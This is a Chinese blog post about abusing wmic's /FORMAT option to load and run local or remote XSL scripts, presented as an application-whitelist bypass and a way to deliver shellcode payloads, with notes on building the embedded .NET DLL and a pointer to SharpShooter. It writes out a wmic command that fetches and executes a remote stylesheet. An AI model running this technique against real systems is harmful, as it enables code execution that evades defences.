vbs调用c++dll_利用wmic调用xsl文件的分析与利用以及细节的答疑

最新推荐文章于 2023-07-23 15:34:02 发布
最新推荐文章于 2023-07-23 15:34:02 发布
阅读量241 收藏
点赞数
文章标签: vbs调用c++dll wmic远程执行命令拒绝访问

Casey Smith@subTee在博客分享的一个技巧,使用wmic能够从本地或从URL调用XSL(可扩展样式表语言)脚本。这个发现很有用,不仅可以作为一种白名单绕过的方法,而且可以作为payload来使用(从URL调用XSL脚本,利用XSL执行exe、shellcode、powershell脚本)。

本地简单的一个wmic.xsl文件内容如下:

<?xml version='1.0'?>

远程执行命令:wmic os get /FORMAT:"https://example.com/wmic.xsl"

或本地执行命令:wmic os get /FORMAT:"d:wmic.xsl"

均会弹出计算器,如图所示:

309d983a49abe671d960bc4c11a41a5d.png

最近在github上获得star很多的点赞教程,micro8.gitbook.io/micro8/contents-1/71-80/80-ji-yu-bai-ming-dan-wmic-zhi-hang-payload-di-shi-ji,也提到了这个用法。它原文中是用了一个执行shellcode的Micropoor_Win7.xsl,代码如下:

<?xml version='1.0'?>

代码中的哪些base64是什么呢?土司论坛中我看到了一篇文章,竟然说是exe文件的base64编码,说是用任意一个exe编码成base64,然后替换就可以了,这个是不对的。我在我头条号上更正吧。

这个是一个dll的base编码(当然用exe也可以),不过这个文件是有要求的,注意代码中的这一句”var entry_class = 'ShellCodeLauncher.Program'; “,说明这是一个类名为ShellCodeLauncher.Program的net程序的base64编码。

我写了一个简单的示例:

bf88d97df4fb67acdd350d8f0dffc99e.png

这个文件生成dll后再编码就可以调用了。注意这个dll的类名为EvalPeak。

所以我的xsl文件代码如下,由于我熟悉vbs,所以我是用vbs写的。

<?xml version='1.0'?>

这个代码按wmic格式运行后也会弹出计算器。

如果你不会.net程序,不会代码怎么办。其实也有现成的生成xsl工具,就是SharpShooter。

e5e1c38a3a3fc412ec363bdd700c9b5c.png

这个工具具体如何利用,我们下次再聊。

weixin_39821605
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xsl 访问其他xml_加载远程XSL文件的宏免杀方法
weixin_39853590的博客
11-27 527
前言打点越来越难了,社工钓鱼会是最常见的攻击手段,0day会是最有效的攻击手段,物理渗透会是危害最大的攻击手段。在钓鱼攻击中木马的形式主要如下:OfficeDLL劫持假冒加固工具木马捆绑通常办公软件Office具有最大的安装量,将文档插入邮件中已经是惯用的工作方式。但是Office常见的攻击方法:0day已知CVE漏洞DDEAUTO注入执行命令宏第一种方法直接跳过,已知的CVE漏洞特征太...
使用 C++ 创建一个 WMI 应用程序
记事本
12-20 2308
使用 C++ 创建一个 WMI 应用程序绝非易事。首先必须初始化 COM(WMI 基于 COM 技术),访问并设置 WMI 协议(调用 CoInitializeEx 和 CoInitializeSecurity 函数以访问 WMI),最后手动完成清理工作。(保持整洁始终很重要!) 以下是连接 WMI 的方法:  通过调用 CoInitializeEx 来初始化 COM。下面的代码示例说
C/C++通过WMI和系统API函数获取获取系统硬件配置信息
Woosa
08-16 2170
前段时间由于项目需要,要求做一个服务器的实时性能监控(CPU、内存、网络利用率等)和读取服务器的硬件配置参数的接口供项目组使用,就是一个类似于鲁大师之类的东东吧...      当然第一想法肯定是利用Windows提供的系统标准API函数来完成所需的功能,当然这也应该是当前最理想最有效率的选择了。但是如果你对API编程不是很熟练的话...那就相当蛋疼了!你知道用API可以做到但是不知道用哪个AP
C++】WMI获取系统硬件信息(CPU/DISK/NetWork etc)
516843761
12-09 624
官网找到一个例子,根据例子修改下可以获取很多信息 原文链接:http://blog.csdn.net/u010352603/article/details/51400769 [cpp] view plain copy  #define _WIN32_DCOM   #include    using namespace std;   #include   
Windows获取硬件信息
qq_28426719的博客
07-23 1668
Windows环境下C++获取硬件信息
wmi.zip_visual c_wmi_wmic 网卡信息_硬盘 信息_网卡信息
09-23
Visual C++,作为微软的C++开发环境,可以利用WMI库来实现对系统资源的访问和控制。本篇文章将深入探讨如何使用Visual C++结合WMI库,获取如硬盘编号、网卡信息等系统硬件数据。 首先,我们要理解WMI的基本概念。...
USB_key.rar_U盘加密_u盘加密程序_u盾_wmic u_加密u盘
09-23
"利用wmic读取设备id"是这个批处理程序的工作方式,通过WMIC获取U盘的唯一标识符,这样可以确保加密与特定的U盘关联,只有插入正确的U盘才能解密并访问其中的数据。 WMIC可以用来查询和管理计算机的各种硬件资源,...
cacti-win.zip_SNMP_ldap_snmp获取数据_wmic update_网络监测
07-14
一套基于PHP,MySQL,SNMP及...它提供了非常强大的数据和用户管理功能,可以指定每一个用户能查看树状结构、host以及任何一张图,还可以与LDAP结合进行用户验证,同时也能自己增加模板,功能非常强大完善,界面友好。
WMIC调用工具
05-03
WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具) ,提供了从命令行接口和批命令脚本执行系统管理的支持。
BAT批处理脚本-文件相关操作-wmic查找文件.zip
最新发布
12-26
在这个"BAT批处理脚本-文件相关操作-wmic查找文件.zip"压缩包中,包含了一个名为"wmic查找文件.bat"的文件,这个脚本利用WMIC(Windows Management Instrumentation Command-line)工具来进行文件查找操作。...
wmic.c C语言实现WMI
09-16
wmic.c C语言实现WMI
如何利用msxsl绕过AppLocker?
weixin_34235457的博客
09-13 268
本文讲的是如何利用msxsl绕过AppLocker?, 0x00 前言 Casey Smith@subTee在twitter分享的一个技巧,使用包含微软签名的msxsl.exe能够执行JScript代码,从而实现对Applocker的绕过。 如图 twitter地址如下: https://twitter.com/subTee/status/87761...
Windows CMD中 WMIC命令整理
迎风悟极道的专栏
07-08 1万+
获得系统版本信息 wmic datafile where Name='c://windows//explorer.exe' get Manufacturer,Version,Filename   获得系统进程  wmic process list full        注意: 这里的full也可以换成brief(简洁)   获得硬件信息(这里以cpu为例) wmic cpu ge
比CMD更强大的命令行:WMIC后渗透利用(系统命令)
热门推荐
discover2210212455的博客
09-15 5万+
写在前面的话 在这篇文章中,我们将讨论如何在攻击的后渗透利用阶段使用WMIC(Windows Management InstrumentationCommand Line)。当攻击者在远程PC上拿到meterpreter会话之后,他们就可以枚举大量的系统信息,并利用WMI命令行工具来进行更深程度的操作。 首先,我们会介绍如何拿到远程PC的meterpreter会话。拿到会话之后,我们还会告诉大...
信息收集--wmic命令
qq_44555676的博客
08-21 1万+
后渗透信息收集之wmic命令的一些使用方法前言一、关于wmic二、wmic的简单使用三、以进程为例展现wmic的使用总结 前言     wmic和cmd一样在所有的windows版本中都存在,同时wmic有很多cmd下不方便使用的部分 一、关于wmic     WMI命令行(WMIC)实用程序为WMI提供了命令行界面。WMIC与现有的Shell和实用程序命令兼容。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用像CIM Stu
Windows WMIC命令使用详解(附实例)
极品飞猪
08-16 9205
[From] http://www.ynpxrz.com/n614885c2025.aspx 温馨提示:易贤网小编为您整理了“Windows WMIC命令使用详解(附实例)”,方便广大网友查阅! 第一次执行WMIC命令时,Windows首先要安装WMIC,然后显示出WMIC的命令行提示符。在WMIC命令行提示符上,命令以交互的方式执行 执行“wmic”命令启动WMIC命令行环
vbs调用windows wmi, WMI和vbs
dickzhu的专栏
05-12 992
vbs 以及 windows 的WMI 系统 https://msdn.microsoft.com/en-us/library/aa393259(v=vs.85).aspx [code="test.vbs" ] On Error Resume Next For Each Disk In GetObject( _ "winmgmts:").InstancesOf ("CI...
WMI和WMIC
bingby的专栏
03-07 2136
wmic就是wmic.exe,位于windows目录底下,是一个命令行程序。WMIC可以以两种模式执行:交互模式(Interactive mode)和非交互模式(Non-Interactive mode) 问:什么是WMI?答:WMI就是 Windows Management Instrumentation(Windows 管理规范)。它是 Windows 中的一个核心管理技术。 问:WM
Covenant利用分析
systemino的博客
11-04 1383
0x00 前言 Covenant是一个.NET开发的C2(command and control)框架,使用.NETCore的开发环境,不仅支持Linux,MacOS和Windows,还支持docker容器。 最特别的地方是支持动态编译,能够将输入的C#代码上传至C2 Server,获得编译后的文件并使用Assembly.Load()从内存进行加载。 本文仅在技术研究的角度,介绍Coven...
python wmic_使用Python获取Windows电池容量
06-12
可以使用Python的`subprocess`模块和Windows的`wmic`命令来获取电池容量。下面是示例代码: ```python import subprocess # 执行wmic命令获取电池容量 output = subprocess.check_output('wmic path Win32_Battery...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值